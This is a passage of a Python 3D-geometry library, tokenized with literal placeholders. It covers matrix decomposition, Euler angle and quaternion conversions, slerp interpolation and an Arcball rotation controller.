<EOL> """<STR_LIT>""" <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = True ) . T <EOL> if abs ( M [ <NUM_LIT:3> , <NUM_LIT:3> ] ) < _EPS : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> M /= M [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> P = M . copy ( ) <EOL> P [ : , <NUM_LIT:3> ] = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> <EOL> if not numpy . linalg . det ( P ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> scale = numpy . 
zeros ( ( <NUM_LIT:3> , ) , dtype = numpy . float64 ) <EOL> shear = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> angles = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> if any ( abs ( M [ : <NUM_LIT:3> , <NUM_LIT:3> ] ) > _EPS ) : <EOL> perspective = numpy . dot ( M [ : , <NUM_LIT:3> ] , numpy . linalg . inv ( P . T ) ) <EOL> M [ : , <NUM_LIT:3> ] = <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> <EOL> else : <EOL> perspective = numpy . array ( ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , dtype = numpy . float64 ) <EOL> translate = M [ <NUM_LIT:3> , : <NUM_LIT:3> ] . copy ( ) <EOL> M [ <NUM_LIT:3> , : <NUM_LIT:3> ] = <NUM_LIT:0> <EOL> row = M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] . copy ( ) <EOL> scale [ <NUM_LIT:0> ] = vector_norm ( row [ <NUM_LIT:0> ] ) <EOL> row [ <NUM_LIT:0> ] /= scale [ <NUM_LIT:0> ] <EOL> shear [ <NUM_LIT:0> ] = numpy . dot ( row [ <NUM_LIT:0> ] , row [ <NUM_LIT:1> ] ) <EOL> row [ <NUM_LIT:1> ] -= row [ <NUM_LIT:0> ] * shear [ <NUM_LIT:0> ] <EOL> scale [ <NUM_LIT:1> ] = vector_norm ( row [ <NUM_LIT:1> ] ) <EOL> row [ <NUM_LIT:1> ] /= scale [ <NUM_LIT:1> ] <EOL> shear [ <NUM_LIT:0> ] /= scale [ <NUM_LIT:1> ] <EOL> shear [ <NUM_LIT:1> ] = numpy . dot ( row [ <NUM_LIT:0> ] , row [ <NUM_LIT:2> ] ) <EOL> row [ <NUM_LIT:2> ] -= row [ <NUM_LIT:0> ] * shear [ <NUM_LIT:1> ] <EOL> shear [ <NUM_LIT:2> ] = numpy . dot ( row [ <NUM_LIT:1> ] , row [ <NUM_LIT:2> ] ) <EOL> row [ <NUM_LIT:2> ] -= row [ <NUM_LIT:1> ] * shear [ <NUM_LIT:2> ] <EOL> scale [ <NUM_LIT:2> ] = vector_norm ( row [ <NUM_LIT:2> ] ) <EOL> row [ <NUM_LIT:2> ] /= scale [ <NUM_LIT:2> ] <EOL> shear [ <NUM_LIT:1> : ] /= scale [ <NUM_LIT:2> ] <EOL> if numpy . dot ( row [ <NUM_LIT:0> ] , numpy . cross ( row [ <NUM_LIT:1> ] , row [ <NUM_LIT:2> ] ) ) < <NUM_LIT:0> : <EOL> scale *= - <NUM_LIT:1> <EOL> row *= - <NUM_LIT:1> <EOL> angles [ <NUM_LIT:1> ] = math . asin ( - row [ <NUM_LIT:0> , <NUM_LIT:2> ] ) <EOL> if math . 
cos ( angles [ <NUM_LIT:1> ] ) : <EOL> angles [ <NUM_LIT:0> ] = math . atan2 ( row [ <NUM_LIT:1> , <NUM_LIT:2> ] , row [ <NUM_LIT:2> , <NUM_LIT:2> ] ) <EOL> angles [ <NUM_LIT:2> ] = math . atan2 ( row [ <NUM_LIT:0> , <NUM_LIT:1> ] , row [ <NUM_LIT:0> , <NUM_LIT:0> ] ) <EOL> else : <EOL> angles [ <NUM_LIT:0> ] = math . atan2 ( - row [ <NUM_LIT:2> , <NUM_LIT:1> ] , row [ <NUM_LIT:1> , <NUM_LIT:1> ] ) <EOL> angles [ <NUM_LIT:2> ] = <NUM_LIT:0.0> <EOL> return scale , shear , angles , translate , perspective <EOL> def compose_matrix ( scale = None , shear = None , angles = None , translate = None , <EOL> perspective = None ) : <EOL> """<STR_LIT>""" <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> if perspective is not None : <EOL> P = numpy . identity ( <NUM_LIT:4> ) <EOL> P [ <NUM_LIT:3> , : ] = perspective [ : <NUM_LIT:4> ] <EOL> M = numpy . dot ( M , P ) <EOL> if translate is not None : <EOL> T = numpy . identity ( <NUM_LIT:4> ) <EOL> T [ : <NUM_LIT:3> , <NUM_LIT:3> ] = translate [ : <NUM_LIT:3> ] <EOL> M = numpy . dot ( M , T ) <EOL> if angles is not None : <EOL> R = euler_matrix ( angles [ <NUM_LIT:0> ] , angles [ <NUM_LIT:1> ] , angles [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> M = numpy . dot ( M , R ) <EOL> if shear is not None : <EOL> Z = numpy . identity ( <NUM_LIT:4> ) <EOL> Z [ <NUM_LIT:1> , <NUM_LIT:2> ] = shear [ <NUM_LIT:2> ] <EOL> Z [ <NUM_LIT:0> , <NUM_LIT:2> ] = shear [ <NUM_LIT:1> ] <EOL> Z [ <NUM_LIT:0> , <NUM_LIT:1> ] = shear [ <NUM_LIT:0> ] <EOL> M = numpy . dot ( M , Z ) <EOL> if scale is not None : <EOL> S = numpy . identity ( <NUM_LIT:4> ) <EOL> S [ <NUM_LIT:0> , <NUM_LIT:0> ] = scale [ <NUM_LIT:0> ] <EOL> S [ <NUM_LIT:1> , <NUM_LIT:1> ] = scale [ <NUM_LIT:1> ] <EOL> S [ <NUM_LIT:2> , <NUM_LIT:2> ] = scale [ <NUM_LIT:2> ] <EOL> M = numpy . dot ( M , S ) <EOL> M /= M [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> return M <EOL> def orthogonalization_matrix ( lengths , angles ) : <EOL> """<STR_LIT>""" <EOL> a , b , c = lengths <EOL> angles = numpy . 
radians ( angles ) <EOL> sina , sinb , _ = numpy . sin ( angles ) <EOL> cosa , cosb , cosg = numpy . cos ( angles ) <EOL> co = ( cosa * cosb - cosg ) / ( sina * sinb ) <EOL> return numpy . array ( ( <EOL> ( a * sinb * math . sqrt ( <NUM_LIT:1.0> - co * co ) , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( - a * sinb * co , b * sina , <NUM_LIT:0.0> , <NUM_LIT:0.0> ) , <EOL> ( a * cosb , b * cosa , c , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) ) , <EOL> dtype = numpy . float64 ) <EOL> def superimposition_matrix ( v0 , v1 , scaling = False , usesvd = True ) : <EOL> """<STR_LIT>""" <EOL> v0 = numpy . array ( v0 , dtype = numpy . float64 , copy = False ) [ : <NUM_LIT:3> ] <EOL> v1 = numpy . array ( v1 , dtype = numpy . float64 , copy = False ) [ : <NUM_LIT:3> ] <EOL> if v0 . shape != v1 . shape or v0 . shape [ <NUM_LIT:1> ] < <NUM_LIT:3> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> t0 = numpy . mean ( v0 , axis = <NUM_LIT:1> ) <EOL> t1 = numpy . mean ( v1 , axis = <NUM_LIT:1> ) <EOL> v0 = v0 - t0 . reshape ( <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> v1 = v1 - t1 . reshape ( <NUM_LIT:3> , <NUM_LIT:1> ) <EOL> if usesvd : <EOL> u , s , vh = numpy . linalg . svd ( numpy . dot ( v1 , v0 . T ) ) <EOL> R = numpy . dot ( u , vh ) <EOL> if numpy . linalg . det ( R ) < <NUM_LIT:0.0> : <EOL> R -= numpy . outer ( u [ : , <NUM_LIT:2> ] , vh [ <NUM_LIT:2> , : ] * <NUM_LIT> ) <EOL> s [ - <NUM_LIT:1> ] *= - <NUM_LIT:1.0> <EOL> M = numpy . identity ( <NUM_LIT:4> ) <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] = R <EOL> else : <EOL> xx , yy , zz = numpy . sum ( v0 * v1 , axis = <NUM_LIT:1> ) <EOL> xy , yz , zx = numpy . sum ( v0 * numpy . roll ( v1 , - <NUM_LIT:1> , axis = <NUM_LIT:0> ) , axis = <NUM_LIT:1> ) <EOL> xz , yx , zy = numpy . sum ( v0 * numpy . 
roll ( v1 , - <NUM_LIT:2> , axis = <NUM_LIT:0> ) , axis = <NUM_LIT:1> ) <EOL> N = ( ( xx + yy + zz , yz - zy , zx - xz , xy - yx ) , <EOL> ( yz - zy , xx - yy - zz , xy + yx , zx + xz ) , <EOL> ( zx - xz , xy + yx , - xx + yy - zz , yz + zy ) , <EOL> ( xy - yx , zx + xz , yz + zy , - xx - yy + zz ) ) <EOL> l , V = numpy . linalg . eig ( N ) <EOL> q = V [ : , numpy . argmax ( l ) ] <EOL> q /= vector_norm ( q ) <EOL> q = numpy . roll ( q , - <NUM_LIT:1> ) <EOL> M = quaternion_matrix ( q ) <EOL> if scaling : <EOL> v0 *= v0 <EOL> v1 *= v1 <EOL> M [ : <NUM_LIT:3> , : <NUM_LIT:3> ] *= math . sqrt ( numpy . sum ( v1 ) / numpy . sum ( v0 ) ) <EOL> M [ : <NUM_LIT:3> , <NUM_LIT:3> ] = t1 <EOL> T = numpy . identity ( <NUM_LIT:4> ) <EOL> T [ : <NUM_LIT:3> , <NUM_LIT:3> ] = - t0 <EOL> M = numpy . dot ( M , T ) <EOL> return M <EOL> def euler_matrix ( ai , aj , ak , axes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> firstaxis , parity , repetition , frame = _AXES2TUPLE [ axes ] <EOL> except ( AttributeError , KeyError ) : <EOL> _ = _TUPLE2AXES [ axes ] <EOL> firstaxis , parity , repetition , frame = axes <EOL> i = firstaxis <EOL> j = _NEXT_AXIS [ i + parity ] <EOL> k = _NEXT_AXIS [ i - parity + <NUM_LIT:1> ] <EOL> if frame : <EOL> ai , ak = ak , ai <EOL> if parity : <EOL> ai , aj , ak = - ai , - aj , - ak <EOL> si , sj , sk = math . sin ( ai ) , math . sin ( aj ) , math . sin ( ak ) <EOL> ci , cj , ck = math . cos ( ai ) , math . cos ( aj ) , math . cos ( ak ) <EOL> cc , cs = ci * ck , ci * sk <EOL> sc , ss = si * ck , si * sk <EOL> M = numpy . 
identity ( <NUM_LIT:4> ) <EOL> if repetition : <EOL> M [ i , i ] = cj <EOL> M [ i , j ] = sj * si <EOL> M [ i , k ] = sj * ci <EOL> M [ j , i ] = sj * sk <EOL> M [ j , j ] = - cj * ss + cc <EOL> M [ j , k ] = - cj * cs - sc <EOL> M [ k , i ] = - sj * ck <EOL> M [ k , j ] = cj * sc + cs <EOL> M [ k , k ] = cj * cc - ss <EOL> else : <EOL> M [ i , i ] = cj * ck <EOL> M [ i , j ] = sj * sc - cs <EOL> M [ i , k ] = sj * cc + ss <EOL> M [ j , i ] = cj * sk <EOL> M [ j , j ] = sj * ss + cc <EOL> M [ j , k ] = sj * cs - sc <EOL> M [ k , i ] = - sj <EOL> M [ k , j ] = cj * si <EOL> M [ k , k ] = cj * ci <EOL> return M <EOL> def euler_from_matrix ( matrix , axes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> firstaxis , parity , repetition , frame = _AXES2TUPLE [ axes . lower ( ) ] <EOL> except ( AttributeError , KeyError ) : <EOL> _ = _TUPLE2AXES [ axes ] <EOL> firstaxis , parity , repetition , frame = axes <EOL> i = firstaxis <EOL> j = _NEXT_AXIS [ i + parity ] <EOL> k = _NEXT_AXIS [ i - parity + <NUM_LIT:1> ] <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) [ : <NUM_LIT:3> , : <NUM_LIT:3> ] <EOL> if repetition : <EOL> sy = math . sqrt ( M [ i , j ] * M [ i , j ] + M [ i , k ] * M [ i , k ] ) <EOL> if sy > _EPS : <EOL> ax = math . atan2 ( M [ i , j ] , M [ i , k ] ) <EOL> ay = math . atan2 ( sy , M [ i , i ] ) <EOL> az = math . atan2 ( M [ j , i ] , - M [ k , i ] ) <EOL> else : <EOL> ax = math . atan2 ( - M [ j , k ] , M [ j , j ] ) <EOL> ay = math . atan2 ( sy , M [ i , i ] ) <EOL> az = <NUM_LIT:0.0> <EOL> else : <EOL> cy = math . sqrt ( M [ i , i ] * M [ i , i ] + M [ j , i ] * M [ j , i ] ) <EOL> if cy > _EPS : <EOL> ax = math . atan2 ( M [ k , j ] , M [ k , k ] ) <EOL> ay = math . atan2 ( - M [ k , i ] , cy ) <EOL> az = math . atan2 ( M [ j , i ] , M [ i , i ] ) <EOL> else : <EOL> ax = math . atan2 ( - M [ j , k ] , M [ j , j ] ) <EOL> ay = math . 
atan2 ( - M [ k , i ] , cy ) <EOL> az = <NUM_LIT:0.0> <EOL> if parity : <EOL> ax , ay , az = - ax , - ay , - az <EOL> if frame : <EOL> ax , az = az , ax <EOL> return ax , ay , az <EOL> def euler_from_quaternion ( quaternion , axes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return euler_from_matrix ( quaternion_matrix ( quaternion ) , axes ) <EOL> def quaternion_from_euler ( ai , aj , ak , axes = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> firstaxis , parity , repetition , frame = _AXES2TUPLE [ axes . lower ( ) ] <EOL> except ( AttributeError , KeyError ) : <EOL> _ = _TUPLE2AXES [ axes ] <EOL> firstaxis , parity , repetition , frame = axes <EOL> i = firstaxis <EOL> j = _NEXT_AXIS [ i + parity ] <EOL> k = _NEXT_AXIS [ i - parity + <NUM_LIT:1> ] <EOL> if frame : <EOL> ai , ak = ak , ai <EOL> if parity : <EOL> aj = - aj <EOL> ai /= <NUM_LIT> <EOL> aj /= <NUM_LIT> <EOL> ak /= <NUM_LIT> <EOL> ci = math . cos ( ai ) <EOL> si = math . sin ( ai ) <EOL> cj = math . cos ( aj ) <EOL> sj = math . sin ( aj ) <EOL> ck = math . cos ( ak ) <EOL> sk = math . sin ( ak ) <EOL> cc = ci * ck <EOL> cs = ci * sk <EOL> sc = si * ck <EOL> ss = si * sk <EOL> quaternion = numpy . empty ( ( <NUM_LIT:4> , ) , dtype = numpy . float64 ) <EOL> if repetition : <EOL> quaternion [ i ] = cj * ( cs + sc ) <EOL> quaternion [ j ] = sj * ( cc + ss ) <EOL> quaternion [ k ] = sj * ( cs - sc ) <EOL> quaternion [ <NUM_LIT:3> ] = cj * ( cc - ss ) <EOL> else : <EOL> quaternion [ i ] = cj * sc - sj * cs <EOL> quaternion [ j ] = cj * ss + sj * cc <EOL> quaternion [ k ] = cj * cs - sj * sc <EOL> quaternion [ <NUM_LIT:3> ] = cj * cc + sj * ss <EOL> if parity : <EOL> quaternion [ j ] *= - <NUM_LIT:1> <EOL> return quaternion <EOL> def quaternion_about_axis ( angle , axis ) : <EOL> """<STR_LIT>""" <EOL> quaternion = numpy . zeros ( ( <NUM_LIT:4> , ) , dtype = numpy . 
float64 ) <EOL> quaternion [ : <NUM_LIT:3> ] = axis [ : <NUM_LIT:3> ] <EOL> qlen = vector_norm ( quaternion ) <EOL> if qlen > _EPS : <EOL> quaternion *= math . sin ( angle / <NUM_LIT> ) / qlen <EOL> quaternion [ <NUM_LIT:3> ] = math . cos ( angle / <NUM_LIT> ) <EOL> return quaternion <EOL> def quaternion_matrix ( quaternion ) : <EOL> """<STR_LIT>""" <EOL> q = numpy . array ( quaternion [ : <NUM_LIT:4> ] , dtype = numpy . float64 , copy = True ) <EOL> nq = numpy . dot ( q , q ) <EOL> if nq < _EPS : <EOL> return numpy . identity ( <NUM_LIT:4> ) <EOL> q *= math . sqrt ( <NUM_LIT> / nq ) <EOL> q = numpy . outer ( q , q ) <EOL> return numpy . array ( ( <EOL> ( <NUM_LIT:1.0> - q [ <NUM_LIT:1> , <NUM_LIT:1> ] - q [ <NUM_LIT:2> , <NUM_LIT:2> ] , q [ <NUM_LIT:0> , <NUM_LIT:1> ] - q [ <NUM_LIT:2> , <NUM_LIT:3> ] , q [ <NUM_LIT:0> , <NUM_LIT:2> ] + q [ <NUM_LIT:1> , <NUM_LIT:3> ] , <NUM_LIT:0.0> ) , <EOL> ( q [ <NUM_LIT:0> , <NUM_LIT:1> ] + q [ <NUM_LIT:2> , <NUM_LIT:3> ] , <NUM_LIT:1.0> - q [ <NUM_LIT:0> , <NUM_LIT:0> ] - q [ <NUM_LIT:2> , <NUM_LIT:2> ] , q [ <NUM_LIT:1> , <NUM_LIT:2> ] - q [ <NUM_LIT:0> , <NUM_LIT:3> ] , <NUM_LIT:0.0> ) , <EOL> ( q [ <NUM_LIT:0> , <NUM_LIT:2> ] - q [ <NUM_LIT:1> , <NUM_LIT:3> ] , q [ <NUM_LIT:1> , <NUM_LIT:2> ] + q [ <NUM_LIT:0> , <NUM_LIT:3> ] , <NUM_LIT:1.0> - q [ <NUM_LIT:0> , <NUM_LIT:0> ] - q [ <NUM_LIT:1> , <NUM_LIT:1> ] , <NUM_LIT:0.0> ) , <EOL> ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:1.0> ) <EOL> ) , dtype = numpy . float64 ) <EOL> def quaternion_from_matrix ( matrix ) : <EOL> """<STR_LIT>""" <EOL> q = numpy . empty ( ( <NUM_LIT:4> , ) , dtype = numpy . float64 ) <EOL> M = numpy . array ( matrix , dtype = numpy . float64 , copy = False ) [ : <NUM_LIT:4> , : <NUM_LIT:4> ] <EOL> t = numpy . 
trace ( M ) <EOL> if t > M [ <NUM_LIT:3> , <NUM_LIT:3> ] : <EOL> q [ <NUM_LIT:3> ] = t <EOL> q [ <NUM_LIT:2> ] = M [ <NUM_LIT:1> , <NUM_LIT:0> ] - M [ <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> q [ <NUM_LIT:1> ] = M [ <NUM_LIT:0> , <NUM_LIT:2> ] - M [ <NUM_LIT:2> , <NUM_LIT:0> ] <EOL> q [ <NUM_LIT:0> ] = M [ <NUM_LIT:2> , <NUM_LIT:1> ] - M [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> else : <EOL> i , j , k = <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> <EOL> if M [ <NUM_LIT:1> , <NUM_LIT:1> ] > M [ <NUM_LIT:0> , <NUM_LIT:0> ] : <EOL> i , j , k = <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> <EOL> if M [ <NUM_LIT:2> , <NUM_LIT:2> ] > M [ i , i ] : <EOL> i , j , k = <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> <EOL> t = M [ i , i ] - ( M [ j , j ] + M [ k , k ] ) + M [ <NUM_LIT:3> , <NUM_LIT:3> ] <EOL> q [ i ] = t <EOL> q [ j ] = M [ i , j ] + M [ j , i ] <EOL> q [ k ] = M [ k , i ] + M [ i , k ] <EOL> q [ <NUM_LIT:3> ] = M [ k , j ] - M [ j , k ] <EOL> q *= <NUM_LIT:0.5> / math . sqrt ( t * M [ <NUM_LIT:3> , <NUM_LIT:3> ] ) <EOL> return q <EOL> def quaternion_multiply ( quaternion1 , quaternion0 ) : <EOL> """<STR_LIT>""" <EOL> x0 , y0 , z0 , w0 = quaternion0 <EOL> x1 , y1 , z1 , w1 = quaternion1 <EOL> return numpy . array ( ( <EOL> x1 * w0 + y1 * z0 - z1 * y0 + w1 * x0 , <EOL> - x1 * z0 + y1 * w0 + z1 * x0 + w1 * y0 , <EOL> x1 * y0 - y1 * x0 + z1 * w0 + w1 * z0 , <EOL> - x1 * x0 - y1 * y0 - z1 * z0 + w1 * w0 ) , dtype = numpy . float64 ) <EOL> def quaternion_conjugate ( quaternion ) : <EOL> """<STR_LIT>""" <EOL> return numpy . array ( ( - quaternion [ <NUM_LIT:0> ] , - quaternion [ <NUM_LIT:1> ] , <EOL> - quaternion [ <NUM_LIT:2> ] , quaternion [ <NUM_LIT:3> ] ) , dtype = numpy . float64 ) <EOL> def quaternion_inverse ( quaternion ) : <EOL> """<STR_LIT>""" <EOL> return quaternion_conjugate ( quaternion ) / numpy . 
dot ( quaternion , quaternion ) <EOL> def quaternion_slerp ( quat0 , quat1 , fraction , spin = <NUM_LIT:0> , shortestpath = True ) : <EOL> """<STR_LIT>""" <EOL> q0 = unit_vector ( quat0 [ : <NUM_LIT:4> ] ) <EOL> q1 = unit_vector ( quat1 [ : <NUM_LIT:4> ] ) <EOL> if fraction == <NUM_LIT:0.0> : <EOL> return q0 <EOL> elif fraction == <NUM_LIT:1.0> : <EOL> return q1 <EOL> d = numpy . dot ( q0 , q1 ) <EOL> if abs ( abs ( d ) - <NUM_LIT:1.0> ) < _EPS : <EOL> return q0 <EOL> if shortestpath and d < <NUM_LIT:0.0> : <EOL> d = - d <EOL> q1 *= - <NUM_LIT:1.0> <EOL> angle = math . acos ( d ) + spin * math . pi <EOL> if abs ( angle ) < _EPS : <EOL> return q0 <EOL> isin = <NUM_LIT:1.0> / math . sin ( angle ) <EOL> q0 *= math . sin ( ( <NUM_LIT:1.0> - fraction ) * angle ) * isin <EOL> q1 *= math . sin ( fraction * angle ) * isin <EOL> q0 += q1 <EOL> return q0 <EOL> def random_quaternion ( rand = None ) : <EOL> """<STR_LIT>""" <EOL> if rand is None : <EOL> rand = numpy . random . rand ( <NUM_LIT:3> ) <EOL> else : <EOL> assert len ( rand ) == <NUM_LIT:3> <EOL> r1 = numpy . sqrt ( <NUM_LIT:1.0> - rand [ <NUM_LIT:0> ] ) <EOL> r2 = numpy . sqrt ( rand [ <NUM_LIT:0> ] ) <EOL> pi2 = math . pi * <NUM_LIT> <EOL> t1 = pi2 * rand [ <NUM_LIT:1> ] <EOL> t2 = pi2 * rand [ <NUM_LIT:2> ] <EOL> return numpy . array ( ( numpy . sin ( t1 ) * r1 , <EOL> numpy . cos ( t1 ) * r1 , <EOL> numpy . sin ( t2 ) * r2 , <EOL> numpy . cos ( t2 ) * r2 ) , dtype = numpy . float64 ) <EOL> def random_rotation_matrix ( rand = None ) : <EOL> """<STR_LIT>""" <EOL> return quaternion_matrix ( random_quaternion ( rand ) ) <EOL> class Arcball ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , initial = None ) : <EOL> """<STR_LIT>""" <EOL> self . _axis = None <EOL> self . _axes = None <EOL> self . _radius = <NUM_LIT:1.0> <EOL> self . _center = [ <NUM_LIT:0.0> , <NUM_LIT:0.0> ] <EOL> self . _vdown = numpy . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , dtype = numpy . float64 ) <EOL> self . 
_constrain = False <EOL> if initial is None : <EOL> self . _qdown = numpy . array ( [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ] , dtype = numpy . float64 ) <EOL> else : <EOL> initial = numpy . array ( initial , dtype = numpy . float64 ) <EOL> if initial . shape == ( <NUM_LIT:4> , <NUM_LIT:4> ) : <EOL> self . _qdown = quaternion_from_matrix ( initial ) <EOL> elif initial . shape == ( <NUM_LIT:4> , ) : <EOL> initial /= vector_norm ( initial ) <EOL> self . _qdown = initial <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> self . _qnow = self . _qpre = self . _qdown <EOL> def place ( self , center , radius ) : <EOL> """<STR_LIT>""" <EOL> self . _radius = float ( radius ) <EOL> self . _center [ <NUM_LIT:0> ] = center [ <NUM_LIT:0> ] <EOL> self . _center [ <NUM_LIT:1> ] = center [ <NUM_LIT:1> ] <EOL> def setaxes ( self , * axes ) : <EOL> """<STR_LIT>""" <EOL> if axes is None : <EOL> self . _axes = None <EOL> else : <EOL> self . _axes = [ unit_vector ( axis ) for axis in axes ] <EOL> def setconstrain ( self , constrain ) : <EOL> """<STR_LIT>""" <EOL> self . _constrain = constrain == True <EOL> def getconstrain ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _constrain <EOL> def down ( self , point ) : <EOL> """<STR_LIT>""" <EOL> self . _vdown = arcball_map_to_sphere ( point , self . _center , self . _radius ) <EOL> self . _qdown = self . _qpre = self . _qnow <EOL> if self . _constrain and self . _axes is not None : <EOL> self . _axis = arcball_nearest_axis ( self . _vdown , self . _axes ) <EOL> self . _vdown = arcball_constrain_to_axis ( self . _vdown , self . _axis ) <EOL> else : <EOL> self . _axis = None <EOL> def drag ( self , point ) : <EOL> """<STR_LIT>""" <EOL> vnow = arcball_map_to_sphere ( point , self . _center , self . _radius ) <EOL> if self . _axis is not None : <EOL> vnow = arcball_constrain_to_axis ( vnow , self . _axis ) <EOL> self . _qpre = self . _qnow <EOL> t = numpy . cross ( self . _vdown , vnow ) <EOL> if numpy . 
dot ( t , t ) < _EPS : <EOL> self . _qnow = self . _qdown <EOL> else : <EOL> q = [ t [ <NUM_LIT:0> ] , t [ <NUM_LIT:1> ] , t [ <NUM_LIT:2> ] , numpy . dot ( self . _vdown , vnow ) ] <EOL> self . _qnow = quaternion_multiply ( q , self . _qdown ) <EOL> def next ( self , acceleration = <NUM_LIT:0.0> ) : <EOL> """<STR_LIT>""" <EOL> q = quaternion_slerp ( self . _qpre , self . _qnow , <NUM_LIT> + acceleration , False ) <EOL> self . _qpre , self . _qnow = self . _qnow , q <EOL> def matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> return quaternion_matrix ( self . _qnow ) <EOL> def arcball_map_to_sphere ( point , center , radius ) : <EOL> """<STR_LIT>""" <EOL> v = numpy . array ( ( ( point [ <NUM_LIT:0> ] - center [ <NUM_LIT:0> ] ) / radius , <EOL> ( center [ <NUM_LIT:1> ] - point [ <NUM_LIT:1> ] ) / radius , <EOL> <NUM_LIT:0.0> ) , dtype = numpy . float64 ) <EOL> n = v [ <NUM_LIT:0> ] * v [ <NUM_LIT:0> ] + v [ <NUM_LIT:1> ] * v [ <NUM_LIT:1> ] <EOL> if n > <NUM_LIT:1.0> : <EOL> v /= math . sqrt ( n ) <EOL> else : <EOL> v [ <NUM_LIT:2> ] = math . sqrt ( <NUM_LIT:1.0> - n ) <EOL> return v <EOL> def arcball_constrain_to_axis ( point , axis ) : <EOL> """<STR_LIT>""" <EOL> v = numpy . array ( point , dtype = numpy . float64 , copy = True ) <EOL> a = numpy . array ( axis , dtype = numpy . float64 , copy = True ) <EOL> v -= a * numpy . dot ( a , v ) <EOL> n = vector_norm ( v ) <EOL> if n > _EPS : <EOL> if v [ <NUM_LIT:2> ] < <NUM_LIT:0.0> : <EOL> v *= - <NUM_LIT:1.0> <EOL> v /= n <EOL> return v <EOL> if a [ <NUM_LIT:2> ] == <NUM_LIT:1.0> : <EOL> return numpy . array ( [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , dtype = numpy . float64 ) <EOL> return unit_vector ( [ - a [ <NUM_LIT:1> ] , a [ <NUM_LIT:0> ] , <NUM_LIT:0> ] ) <EOL> def arcball_nearest_axis ( point , axes ) : <EOL> """<STR_LIT>""" <EOL> point = numpy . array ( point , dtype = numpy . float64 , copy = False ) <EOL> nearest = None <EOL> mx = - <NUM_LIT:1.0> <EOL> for axis in axes : <EOL> t = numpy . 
dot ( arcball_constrain_to_axis ( point , axis ) , point ) <EOL> if t > mx : <EOL> nearest = axis <EOL> mx = t <EOL> return nearest <EOL> _EPS = numpy . finfo ( float ) . eps * <NUM_LIT> <EOL> _NEXT_AXIS = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ] <EOL> _AXES2TUPLE = { <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ) , '<STR_LIT>' : ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ) , '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ) , <EOL> '<STR_LIT>' : ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , 